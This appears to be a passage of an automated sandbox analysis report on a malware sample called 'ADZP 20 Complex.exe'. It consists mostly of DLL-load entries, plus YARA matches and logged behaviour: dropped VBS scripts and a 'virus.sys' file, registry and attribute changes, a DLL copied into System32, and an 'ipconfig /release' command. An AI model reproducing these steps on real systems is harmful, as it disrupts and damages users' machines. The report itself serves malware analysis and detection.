                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: textshaping.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: textshaping.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\msg.exe | Section loaded: winsta.dll
                  Source: C:\Windows\System32\msg.exe | Section loaded: winsta.dll
                  Source: C:\Windows\System32\msg.exe | Section loaded: winsta.dll
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Section loaded: winmm.dll
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\notepad.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\notepad.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\notepad.exe | Section loaded: mrmcorer.dll
                  Source: C:\Windows\System32\notepad.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\notepad.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\notepad.exe | Section loaded: textshaping.dll
                  Source: C:\Windows\System32\notepad.exe | Section loaded: efswrt.dll
                  Source: C:\Windows\System32\notepad.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\notepad.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\notepad.exe | Section loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\notepad.exe | Section loaded: oleacc.dll
                  Source: C:\Windows\System32\notepad.exe | Section loaded: textinputframework.dll
                  Source: C:\Windows\System32\notepad.exe | Section loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\notepad.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\notepad.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\notepad.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: propsys.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: ieframe.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: netapi32.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: wkscli.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: edputil.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: secur32.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: mlang.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: wininet.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: policymanager.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: twinui.appcore.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: execmodelproxy.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: mrmcorer.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: windows.staterepositorycore.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: appxdeploymentclient.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: bcp47mrm.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: windows.ui.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: windowmanagementapi.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: textinputframework.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: inputhost.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\calc.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\explorer.exe | Section loaded: aepic.dll
                  Source: C:\Windows\explorer.exe | Section loaded: twinapi.dll
                  Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
                  Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
                  Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exe | Section loaded: dxgi.dll
                  Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
                  Source: C:\Windows\explorer.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\explorer.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\explorer.exe | Section loaded: wtsapi32.dll
                  Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
                  Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
                  Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\explorer.exe | Section loaded: twinapi.appcore.dll
                  Source: C:\Windows\explorer.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\explorer.exe | Section loaded: wldp.dll
                  Source: C:\Windows\explorer.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\explorer.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\explorer.exe | Section loaded: netutils.dll
                  Source: C:\Windows\explorer.exe | Section loaded: umpdc.dll
                  Source: C:\Windows\explorer.exe | Section loaded: profapi.dll
                  Source: C:\Windows\explorer.exe | Section loaded: edputil.dll
                  Source: C:\Windows\explorer.exe | Section loaded: apphelp.dll
                  Source: C:\Windows\explorer.exe | Section loaded: appresolver.dll
                  Source: C:\Windows\explorer.exe | Section loaded: bcp47langs.dll
                  Source: C:\Windows\explorer.exe | Section loaded: slc.dll
                  Source: C:\Windows\explorer.exe | Section loaded: sppc.dll
                  Source: C:\Windows\explorer.exe | Section loaded: starttiledata.dll
                  Source: C:\Windows\explorer.exe | Section loaded: usermgrcli.dll
                  Source: C:\Windows\explorer.exe | Section loaded: usermgrproxy.dll
                  Source: C:\Windows\explorer.exe | Section loaded: cscui.dll
                  Source: C:\Windows\explorer.exe | Section loaded: structuredquery.dll
                  Source: C:\Windows\explorer.exe | Section loaded: windows.globalization.dll
                  Source: C:\Windows\explorer.exe | Section loaded: bcp47mrm.dll
                  Source: C:\Windows\explorer.exe | Section loaded: icu.dll
                  Source: C:\Windows\explorer.exe | Section loaded: mswb7.dll
                  Source: C:\Windows\explorer.exe | Section loaded: windows.storage.search.dll
                  Source: C:\Windows\explorer.exe | Section loaded: explorerframe.dll
                  Source: C:\Windows\explorer.exe | Section loaded: actxprxy.dll
                  Source: C:\Windows\explorer.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\explorer.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: apphelp.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: acgenral.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: mfc42u.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: propsys.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: winmm.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: ninput.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: msftedit.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: uiribbon.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: xmllite.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: efswrt.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: sti.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: wiatrace.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: atlthunk.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: dwmapi.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: windowscodecs.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: textshaping.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: oleacc.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: textinputframework.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\mspaint.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: propsys.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: edputil.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: policymanager.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                  Source: C:\Windows\System32\wscript.exe | Automated click: OK
                  Source: C:\Windows\System32\wscript.exe | Automated click: OK
                  Source: C:\Windows\System32\taskkill.exe | Automated click: OK
                  Source: C:\Windows\System32\wscript.exe | Automated click: OK
                  Source: C:\Windows\System32\wscript.exe | Automated click: OK
                  Source: C:\Windows\System32\wscript.exe | Automated click: OK
                  Source: C:\Windows\System32\wscript.exe | Automated click: OK
                  Source: C:\Windows\System32\wscript.exe | Automated click: OK
                  Source: C:\Windows\System32\wscript.exe | Automated click: OK
                  Source: C:\Windows\System32\wscript.exe | Automated click: OK
                  Source: C:\Windows\System32\wscript.exe | Automated click: OK
                  Source: C:\Windows\System32\wscript.exe | Automated click: OK
                  Source: C:\Windows\System32\wscript.exe | Automated click: OK
                  Source: C:\Windows\System32\mspaint.exe | File opened: C:\Windows\system32\MSFTEDIT.DLL
                  Source: Window Recorder | Window detected: More than 3 window changes detected
                  Source: C:\Windows\System32\calc.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations

                  Data Obfuscation

                  Source: Yara match | File source: ADZP 20 Complex.exe, type: SAMPLE
                  Source: Yara match | File source: 37.2.ADZP 20 Complex.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 30.0.ADZP 20 Complex.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 37.0.ADZP 20 Complex.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 47.2.ADZP 20 Complex.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 47.0.ADZP 20 Complex.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.ADZP 20 Complex.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 30.2.ADZP 20 Complex.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.ADZP 20 Complex.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: C:\Users\user\Desktop\Twain_20.dll, type: DROPPED
                  Source: Yara match | File source: C:\Users\user\Desktop\Twain_20.dll, type: DROPPED
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Code function: 0_2_0040ADD6 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary, 0_2_0040ADD6
                  Source: ADZP 20 Complex.exe | Static PE information: section name: .code
                  Source: Twain_20.dll.2.dr | Static PE information: section name: .code
                  Source: Twain_20.dll0.2.dr | Static PE information: section name: .code

                  Persistence and Installation Behavior

                  Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\Desktop\ErrorCritico.vbs
                  Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\Desktop\Advertencia.vbs
                  Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\Desktop\Informacion.vbs
                  Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\Desktop\virus.sys
                  Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
                  Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
                  Source: C:\Windows\System32\cmd.exe | Process created: attrib.exe
                  Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
                  Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
                  Source: C:\Windows\System32\cmd.exe | Process created: attrib.exe
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /release
                  Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\Desktop\Twain_20.dll
                  Source: C:\Windows\System32\cmd.exe | File created: C:\Windows\System32\Twain_20.dll
                  Source: C:\Windows\System32\cmd.exe | File created: C:\Windows\System32\Twain_20.dll

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeFile created: C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.batJump to dropped file
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeFile created: C:\Users\user\AppData\Local\Temp\B132.tmp\B133.tmp\B134.batJump to dropped file
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeFile created: C:\Users\user\AppData\Local\Temp\B539.tmp\B53A.tmp\B53B.batJump to dropped file
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeFile created: C:\Users\user\AppData\Local\Temp\BE03.tmp\BE04.tmp\BE05.batJump to dropped file
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mspaint.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mspaint.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mspaint.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mspaint.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mspaint.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mspaint.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mspaint.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mspaint.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe Window / User API: threadDelayed 2832
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 781
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe Window / User API: threadDelayed 2622
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe Window / User API: threadDelayed 1711
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe Window / User API: threadDelayed 2488
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe TID: 7348 Thread sleep count: 2622 > 30
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe TID: 7532 Thread sleep count: 1711 > 30
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe TID: 7896 Thread sleep count: 2488 > 30
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
